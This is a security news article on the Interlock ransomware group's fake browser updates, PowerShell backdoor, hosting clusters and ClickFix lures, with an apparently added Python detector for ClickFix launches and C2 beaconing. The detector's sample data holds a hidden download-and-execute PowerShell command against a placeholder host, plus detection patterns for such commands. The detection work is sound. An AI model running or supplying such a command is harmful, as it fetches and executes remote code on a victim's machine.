Interlock Ransomware Uses Multi-Stage Attack Through Legitimate Websites to Deliver Malicious Browser Updates

The Interlock ransomware intrusion set has escalated its operations across North America and Europe with sophisticated techniques.

Not falling under the typical Ransomware-as-a-Service (RaaS) category, Interlock operates independently, focusing primarily on Big Game Hunting and double extortion campaigns.

This group’s activities have been closely monitored by cybersecurity firms such as Sekoia Threat Detection & Research (TDR) and others, revealing their evolving tactics and tools.


Attack Mechanism and Execution

Interlock initiates its attack by compromising legitimate websites to host deceptive browser update pages, leveraging the trust users have in these platforms.

[Figure: Screenshot of Interlock’s DLS]

Here’s how the attack unfolds:

1. Fake Updater Deployment:

The ransomware’s initial access vector is a fake browser update hosted on compromised websites.

These updates appear as legitimate Google Chrome or Microsoft Edge installers but are, in fact, PyInstaller files. When a user executes this update, it:

• Downloads and runs a legitimate installer.
• Simultaneously launches a PowerShell script acting as a backdoor.

2. PowerShell Backdoor:

This script operates in a loop, continuously executing HTTP requests to communicate with command-and-control (C2) servers. It’s designed for resilience, utilizing:

• A continuous communication loop with the C2 server for persistence.
• Collection of system information, including user context and system details, which is then transmitted to the attacker.

3. Command Execution:

The C2 server can issue various commands, including:

• Terminating the backdoor.
• Deploying additional malware such as keyloggers or credential stealers (e.g., LummaStealer, BerserkStealer).

Domain and IP Clustering for Resilience

According to the report, Interlock’s operators employ a strategy of IP address clustering to maintain their infrastructure’s resilience:

Cluster Composition

Each cluster typically includes:

• One IP from BitLaunch, allowing cryptocurrency transactions.
• One from Hetzner Online GmbH, known for its robust hosting services.
• A third from various autonomous systems to complicate disruption efforts.

ClickFix Technique for Initial Access

Around January 2025, Interlock adopted the ClickFix technique:

• Deceptive Prompts: Victims are persuaded to manually execute malicious PowerShell commands through fake CAPTCHA verifications or system prompts.
• Fake Installer Distribution: This technique was used to distribute a fake installer payload, but its usage seems to have been abandoned by February 2025.
[Figure: Fake Cloudflare CAPTCHA asking users to execute a command to access a website]
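Two of the behaviours described above are detectable from ordinary telemetry: a ClickFix prompt ends with the victim pasting a PowerShell command into the Run dialog (so PowerShell is spawned by explorer.exe), and the backdoor polls its C2 in a fixed loop over HTTP. The following is an added example, not code from the report or from Sekoia; the process events and proxy lines are constructed, the C2 hostname is one of the trycloudflare.com domains listed in the report, and `c2.invalid`/`example.invalid` are placeholders.

```python
import re
from collections import defaultdict
from statistics import pstdev

# Constructed sample events (not from the report): one ClickFix-style launch, where the
# pasted command makes explorer.exe the parent of PowerShell, and one benign script run.
PROCESS_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell -w hidden -ep bypass -c "iwr http://c2.invalid/a | iex"'},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmd": "powershell -File C:\\scripts\\backup.ps1"},
]
# Constructed proxy lines: "<seconds> <client> <method> <url>". The first host is a
# trycloudflare.com backdoor C2 domain from the report; the second is a benign placeholder.
PROXY_LOG = """\
0 10.0.0.5 GET http://refrigerator-cheers-indicator-ferrari.trycloudflare.com/
60 10.0.0.5 GET http://refrigerator-cheers-indicator-ferrari.trycloudflare.com/
120 10.0.0.5 GET http://refrigerator-cheers-indicator-ferrari.trycloudflare.com/
180 10.0.0.5 GET http://refrigerator-cheers-indicator-ferrari.trycloudflare.com/
30 10.0.0.7 GET http://intranet.example.invalid/news
400 10.0.0.7 GET http://intranet.example.invalid/news
"""
# Hidden window, encoded command, or download-and-execute cmdlets in the command line.
SUSPICIOUS_ARGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|iwr|invoke-webrequest|iex|invoke-expression", re.I)

def clickfix_suspects(events):
    """Return command lines of PowerShell launched from explorer.exe (Run dialog) with suspicious flags."""
    return [e["cmd"] for e in events
            if e["image"].lower() == "powershell.exe"
            and e["parent"].lower() == "explorer.exe"
            and SUSPICIOUS_ARGS.search(e["cmd"])]

def beacon_suspects(log, min_hits=4, max_jitter=5.0):
    """Flag (client, host) pairs polling at a near-constant interval, or any host on a trycloudflare tunnel."""
    times = defaultdict(list)
    for line in log.splitlines():
        ts, client, _method, url = line.split()
        host = re.sub(r"^https?://", "", url).split("/")[0]
        times[(client, host)].append(float(ts))
    hits = []
    for (client, host), ts in times.items():
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        tunnel = host.endswith(".trycloudflare.com")  # free tunnel service abused for C2 in this campaign
        periodic = len(ts) >= min_hits and pstdev(gaps) <= max_jitter
        if periodic or tunnel:
            hits.append({"client": client, "host": host, "hits": len(ts), "tunnel": tunnel})
    return hits
```

On real data, feed Sysmon event ID 1 (process creation) into `clickfix_suspects` and proxy or DNS logs into `beacon_suspects`, and tune `max_jitter` to the backdoor sleep interval observed in your environment.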

The sophistication and evolution of Interlock’s tactics, from using fake browser updates to employing social engineering techniques like ClickFix, illustrate its adaptability and potential for further growth.

With a focus on high-value targets and the ability to evade traditional network security, Interlock remains a significant threat.

Cybersecurity measures must be updated continuously to counter the dynamic strategies of this ransomware group.

Indicators of Compromise (IoC)

The following table lists the IoCs associated with Interlock’s activities:



About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.